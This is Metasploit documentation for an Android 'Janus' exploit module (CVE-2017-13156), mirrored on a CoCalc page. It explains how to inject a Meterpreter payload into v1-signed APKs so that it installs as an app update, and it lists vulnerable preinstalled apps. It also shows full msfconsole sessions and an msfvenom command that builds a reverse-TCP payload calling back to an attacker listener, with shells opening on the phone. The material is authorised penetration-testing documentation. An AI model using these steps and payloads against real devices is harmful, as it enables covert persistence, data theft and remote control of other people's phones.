CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/android/local/janus.md
Views: 1904

Description

This module exploits CVE-2017-13156 in Android to install a payload into another application. The payload APK will have the same signature and can be installed as an update, preserving the existing data. The vulnerability was fixed in the 5th December 2017 security patch, and was additionally fixed by the APK Signature scheme v2, so only APKs signed with the v1 scheme are vulnerable.

This module will potentially give two things, the first is access to the private date for the app which was injected in to. The second is a more stealthy persistence mechanism since the payload will start each time the injected app starts.

Some devices when installing the updated apk file give an error "There was a problem parsing the package."

Confirmed Vulnerable Apps

The following table shows known vulnerable apps either pre-installed on a phone or available to download.

PackageVersionFrom PhoneMD5
com.google.android.googlequicksearchboxStock ZTE Z798BL Android 6.0.1 tracphone854378571509c9aa7a49f84d3f2c11c8
com.ume.browser.northamerica (Browser)v3.42.21161215Stock ZTE Z798BL Android 6.0.1 tracphone726a13647fb6afb9c147b540641eb82a
com.phonegap.camerasample1.000411ebec8e7ab3fc0292070cba5efbd
com.android.vending (Google play store)6.9.21.G-all [0] 3270725Stock ZTE Z798BL Android 6.0.1 tracphonebed81c338f61c6095265592ee6fbb6d8
com.apptap.appfinder.tracfone1.7.5.0Stock ZTE Z798BL Android 6.0.1 tracphonec20da001a44cd30cc09c1460ca84f743
com.tracfone.generic.downloaderappR3.1.2Stock ZTE Z798BL Android 6.0.1 tracphone448d39f6e5b2370d5b14f24c0d2dd79b
com.google.android.tts (must enable TalkBack feature)3.10.10Stock ZTE Z798BL Android 6.0.1 tracphonec44485e17a9a5987e9e3d09507b2bfda
com.google.android.videos3.19.11Stock ZTE Z798BL Android 6.0.1 tracphonee95baeda7fabc3173289be7274fa350f

Hostile Apps

This table shows apps which seemed to work (injected, installed without error) but had adverse effects. These apps should typically be avoided unless tested.

PackageVersionFrom PhoneMD5Issue
com.google.android.youtube11.38.54Stock ZTE Z798BL Android 6.0.1 tracphone8152ea89b99da5fe66880607a8f93d96App crash on start
com.android.launcher3Stock ZTE Z798BL Android 6.0.1 tracphone45139b7bf9cc328dcd1f0a3f01f87eb6Seems to be the GUI for the phone. When GUI restarted, no session.
com.instagram.androidstubStock ZTE Z798BL Android 6.0.1 tracphone6e8543dec479508f4952ece014218597No session
com.google.android.music6.14.3420-0.G.3279860Stock ZTE Z798BL Android 6.0.1 tracphone09a49fea442c88b23a8f3752caff33deApp crash on start
com.google.android.apps.docsStock ZTE Z798BL Android 6.0.1 tracphoneb0e96f36b7bdfa7ca3064c71538c1339App loop, no start
com.google.android.apps.maps9.38.1Stock ZTE Z798BL Android 6.0.1 tracphone91d0f8f24ce451deb31cf9f4b9a1d3c6App crash on start
com.android.chrome53.0.2785.124Stock ZTE Z798BL Android 6.0.1 tracphoneac6bbbd5ea559dbb63c42eb7e863286bOriginal session dies on upload
com.google.android.gmsStock ZTE Z798BL Android 6.0.1 tracphone504de5427ec47fa3e124c7b5e3413c50Original session dies on upload

Vulnerable Application

This module will only work on applications that are signed with only the v1 signature scheme. You can verify which signing scheme an APK is signed with using the apksigner tool in the Android SDK:

$ apksigner verify -verbose notvulnerable.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Number of signers: 1

$ apksigner verify -verbose vulnerableapplication.apk
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): false
Number of signers: 1

Verification Steps

  1. Start msfconsole

  2. Get a session

  3. Start a handler with exploit/multi/handlers

  4. Do: use exploit/android/local/janus

  5. Do: set session [session]

  6. Do: check

  7. Do: run

  8. On the phone, a new screen will ask about installing the updated app, say yes/ok, then open the app.

  9. You should get a new session.

Options

PACKAGE

Select a package to infect. A list of packages can be obtained by running app_list on meterpreter. Using ALL will loop through all packages and attempt to exploit them until successful. This can take a while, and cause lots of data to be transferred. Default is com.phonegap.camerasample

Scenarios

com.phonegap.camerasample on Nexus 6p with November 2016 Security Patch

Install com.phonegap.camerasample

An exploit/multi/handler was started prior to exploitation.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information         Connection
  --  ----  ----                        -----------         ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf5 exploit(multi/handler) > use exploit/android/local/janus
msf5 exploit(android/local/janus) > set PACKAGE com.phonegap.camerasample
PACKAGE => com.phonegap.camerasample
msf5 exploit(android/local/janus) > set SESSION 1
SESSION => 1
msf5 exploit(android/local/janus) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf5 exploit(android/local/janus) > set LPORT 4445
LPORT => 4445
msf5 exploit(android/local/janus) > run

[*] Downloading APK: /data/app/com.phonegap.camerasample-1/base.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.phonegap.camerasample.syerq
[*] Loading /tmp/d20190824-7164-qydvgj/original/smali/com/phonegap/camerasample/CameraSampleActivity.smali and injecting payload..
[*] Rebuilding apk with meterpreter injection as /tmp/d20190824-7164-qydvgj/output.apk
[*] Uploading APK: /sdcard/app.apk
[*] APK uploaded
msf5 exploit(android/local/janus) >

Please note that the user will need to manually accept the install prompt on the device (and also open the application) before a new session is opened.

[*] Sending stage (72609 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800

msf5 exploit(android/local/janus) > sessions 2
[*] Starting interaction with 2...

meterpreter > pwd
/data/user/0/com.phonegap.camerasample/files

Browser (com.ume.browser.northamerica) on ZTE Z798BL Android 6.0.1 with December 2016 Security Patch

Original payload was generated as such:

./msfvenom -p android/meterpreter_reverse_tcp LHOST=1.1.1.1 LPORT=9999 -o /var/www/html/android.apk

resource (janus.rb)> use exploit/multi/handler
resource (janus.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (janus.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (janus.rb)> set lport 9999
lport => 9999
resource (janus.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:9999 
[*] Meterpreter session 1 opened (1.1.1.1:9999 -> 2.2.2.2:43753) at 2019-11-05 20:08:53 -0500
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used

meterpreter > getuid
Server username: u0_a89
meterpreter > pwd
/data/user/0/com.metasploit.stage/files
meterpreter > sysinfo
Computer    : localhost
OS          : Android 6.0.1 - Linux 3.10.49-gc5a5f6b-00560-gb1fe534 (armv7l)
Meterpreter : dalvik/android
meterpreter > background
[*] Backgrounding session 1...

Start the payload handler to catch the new callback

resource (janus.rb)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (janus.rb)> set lport 4444
lport => 4444
resource (janus.rb)> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

Exploit

resource (janus.rb)> use janus

[*] Started reverse TCP handler on 1.1.1.1:4444 

Matching Modules
================

   #  Name                         Disclosure Date  Rank    Check  Description
   -  ----                         ---------------  ----    -----  -----------
   0  exploit/android/local/janus  2017-07-31       manual  Yes    Android Janus APK Signature bypass


[*] Using exploit/android/local/janus
resource (janus.rb)> set session 1
session => 1
resource (janus.rb)> set package com.ume.browser.northamerica
package => com.ume.browser.northamerica
resource (janus.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (janus.rb)> set lport 4444
lport => 4444
resource (janus.rb)> set verbose true
verbose => true
resource (janus.rb)> run
[+] Android version 6.0.1 appears to be vulnerable.
[+] Android security patch level 2016-12-01 is vulnerable
[*] Downloading APK: /system/priv-app/UmeBrowser/UmeBrowser.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.ume.browser.northamerica.onhad
[*] Loading /tmp/d20191105-15343-1heobn1/original/smali/com/ume/browser/UmeApplication.smali and injecting payload..
[*] Rebuilding apk with meterpreter injection as /tmp/d20191105-15343-1heobn1/output.apk
[*] Uploading APK: /sdcard/app.apk
[*] APK uploaded
[*] User should now have a prompt to install an updated version of the app
msf5 exploit(android/local/janus) >

Install the app on the phone. For this app, clicking Open was not required, the shell was immediate.

phone 1 phone 2 phone 3

WARNING: Local file /root/metasploit-framework/data/android/metstage.jar is being used
WARNING: Local file /root/metasploit-framework/data/android/meterpreter.jar is being used

[*] Sending stage (73445 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:38676) at 2019-11-05 20:12:38 -0500

[-] Unknown command: (installing.
msf5 exploit(android/local/janus) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: u0_a34
meterpreter > pwd
/data/user/0/com.ume.browser.northamerica/files